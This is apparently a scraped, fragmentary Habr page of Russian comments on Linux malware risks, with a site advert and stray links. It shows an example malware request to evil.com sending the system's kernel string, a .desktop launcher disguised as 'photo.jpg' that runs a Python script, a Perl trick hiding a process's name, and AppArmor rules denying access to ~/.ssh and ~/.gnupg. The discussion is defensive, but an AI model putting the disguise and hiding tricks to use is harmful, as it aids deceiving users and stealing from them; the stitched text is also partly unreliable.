Хабр Курсы для всех
РЕКЛАМА
Практикум, Хекслет, SkyPro, авторские курсы — собрали всех и попросили скидки. Осталось выбрать!
GET evil.com/get0day?uname=2.6.31-16-generic+%2352-Ubuntu+SMP+Thu+Dec+3+22%3A07%3A16+UTC+2009+x86_64+GNU%2FLinux — скажет малварь.Загрузка софта происходит из официальных репозитариев что исключает появление там вредоносного кода.
Ну не поставит он его в Линуксе, просто не осилит. Это же нужно руками пакет достать, отключить предупреждение об опасности, удостоверится, что все зависимости скачались, а если зависимостей не хватает то и вовсе облом.Что-то мне подсказывает, что если вредоносная программа попытается выдать себя за пакет с некой безобидной программкой, то там постараются не делать зависимостей вообще. Как раз, чтобы поставилась в максимуме случаев.

*links *free *git на хабре подсказали бесплатный приватный хостинг git и svn. С багтрекером и прочими блекджеками. unfuddle.com
juick.com/157321
никто особо тщательных усилий на создание атакующих программ не предпринимал
Немного не понял про установку вируса в один клик — это как? В официальных репах все пакеты подписаны, так что туда проникнуть шансов ноль.Ну как… На каком-нить сайте описывается «новая прикольная программка», которая кроме обещанных функций реально содержит вредоносный код. А потом приписано: «В официальных репах её пока нет, поэтому нужно добавить вот этот репозиторий (рассказывается как это сделать) либо скачать бинарный deb/rpm-пакет». Некоторые поведутся и скачают. А потом ещё через sudo и права рута дадут этой программке на установку, куда она пожелает.
seriy@seriy-desktop:~/Desktop$ cat photo.jpg.desktop
[Desktop Entry]
Encoding=UTF-8
Version=1.0
Type=Application
Terminal=false
Icon[ru_RU]=gnome-panel-clock
Exec=env python ~/.virus/virus.py
Icon=~/.virus/jpeg-icon.png$ cat a.pl
#!/usr/bin/perl
$0 = 'anything';
sleep 100;
$ perl a.pl &
[1] 3065
$ ps ax | grep anything
3065 pts/14 S 0:00 anything
3067 pts/14 R+ 0:00 grep anything
$ ls -l /proc/3065/fd/
итого 0
lrwx------ 1 grib grib 64 Янв 25 00:51 0 -> /dev/pts/14
lrwx------ 1 grib grib 64 Янв 25 00:51 1 -> /dev/pts/14
lrwx------ 1 grib grib 64 Янв 25 00:50 2 -> /dev/pts/14
l-wx------ 1 grib grib 64 Янв 25 00:51 7 -> pipe:[1040540]
$ ps -o args,comm | grep anything
anything perlseriy@seriy-desktop:~$ ls -la | grep bashrc
-rw-r--r-- 1 seriy seriy 2298 2008-04-19 09:29 .bashrc
@{HOME}/ r,
@{HOME}/** rw,
@{HOME}/Desktop/** rw,
@{HOME}/Firefox_wallpaper* rw,
audit deny @{HOME}/.ssh/** mrwkl,
audit deny @{HOME}/.gnome2_private/** mrwkl,
audit deny @{HOME}/.gnupg/** mrwkl,
@{HOME}/.mozilla/ rw,
@{HOME}/.mozilla/** rw,
@{HOME}/.mozilla/**/*.sqlite* k,
@{HOME}/.mozilla/**/.parentlock k,
@{HOME}/.mozilla/plugins/** rm,
@{HOME}/.mozilla/**/plugins/** rm,
@{HOME}/.icedteaplugin/ rw,
@{HOME}/.icedteaplugin/** rw,
@{HOME}/.adobe/ rw,
@{HOME}/.adobe/** rw,
@{HOME}/.macromedia/ rw,
@{HOME}/.macromedia/** rw,
@{HOME}/.java/ rw,
@{HOME}/.java/** rwk,
@{HOME}/.mozilla/**/extensions/** mixr,
Linux, безопасность, подумаем о будущем